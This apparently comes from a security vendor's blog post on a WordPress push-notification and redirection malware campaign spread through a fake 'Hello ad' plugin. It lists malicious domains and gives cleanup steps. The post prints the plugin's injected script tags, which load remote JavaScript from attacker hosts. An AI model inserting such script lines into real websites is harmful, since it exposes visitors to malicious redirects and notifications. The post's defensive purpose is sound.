Since the last couple of weeks, the security researchers at Astra have been tracking a push notifications malware on WordPress. This campaign has been combined with the on-going redirection campaign on WordPress websites.
A few malicious domains where the redirection is happening include inpagepush[.]com, asoulrox[.]com and iclickcdn[.]com, justcannabis[.]online, 0.realhelpcompany[.]ga, fast.helpmart[.]ga/m[.]js?w=085, etc.
Hackers have gone one step ahead this time to make this hack campaign more sophisticated by installing a legitimate looking ‘Hello ad’ plugin to infected WordPress websites. More on it below.
Related Guide – Complete WordPress Hack Removal Guide
Symptoms of the Push Notifications Malware – WordPress
- Vulgar Push Notifications: Visitors being shown malicious/vulgar push notifications when visiting your website:
- Website Redirection: Website redirection to malicious pages on clicking links from our website (which ideally should go to pages within your WordPress)
A few URLs where your website might be redirecting to include inpagepush[.]com, asoulrox[.]com and iclickcdn[.]com. - Unknown Plugins Found: In some cases we’ve identified a new malicious plugin is added to the WordPress by the name of ‘Hello ad’.
- Device Specific/Mobile Only Virus: We’ve noticed that this malware hides itself really well. It won’t always send the push notifications or redirect users. The behavior is device-specific.
Sometimes the malware shows push notifications only on mobile devices and sometimes it only redirects new users, not someone who has already opened the website earlier.
Curious Case of Malicious Hello Ad Plugin
We’ve seen ‘Hello ad’ plugin being added on these malicious websites to redirect users to hacker controlled websites.
This legitimate looking plugins adds the following malicious Javascript code to the page source:
<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',3336627,document.body||document.documentElement)</script>
<script src="https://asoulrox.com/pfe/current/tag.min.js?z=3336643" data-cfasync="false" async></script>
<script type="text/javascript" src="//inpagepush.com/400/3336649" data-cfasync="false" async="async"></script>
The code added by this plugin plays an important role in making the redirection. Though, we’ve seen hackers are evolving and obfuscating this with each new campaign.
How to fix the Push Notifications Malware, Hello Ad & Redirection Hack Campaign
- Check the obvious places: Hackers have a few favorite places where they insert the virus/malware code. When starting to fix your WordPress, it’s best you start with these. The following files should be looked at first:
- index.php
- wp-content/themes/{themeName}/functions.php
- wp-config.php
- Core theme files
- .htaccess
- Find & remove hello ad plugin: If you find this ‘legitimate looking’ plugin that you think your developer or you might have installed in the past – please un-install it as that’s not the case 🙂
Related Guide – WordPress Malware Removal - Removing Redirection: WordPress redirection attacks have been happening for months now. Taking care of malicious redirection hacks requires looking into the database tables, core theme files and sometimes your server’s configuration files too. Look for scripts/resources loaded from unknown URLs.
Since redirection malware is so prevalent , we’ve made a detailed step-by-step video on fixing redirection hacks. Though hackers always keep on updating their methods to avoid coming on the radar of security companies, thee underlying principle is the same.
Hackers are always evolving their methods, exploiting vulnerabilities not known to the world and combining various exploits to create a hack. While removing the hack is one part, ensuring one never gets hacked requires something more permanent – like Astra’s Security suite 🙂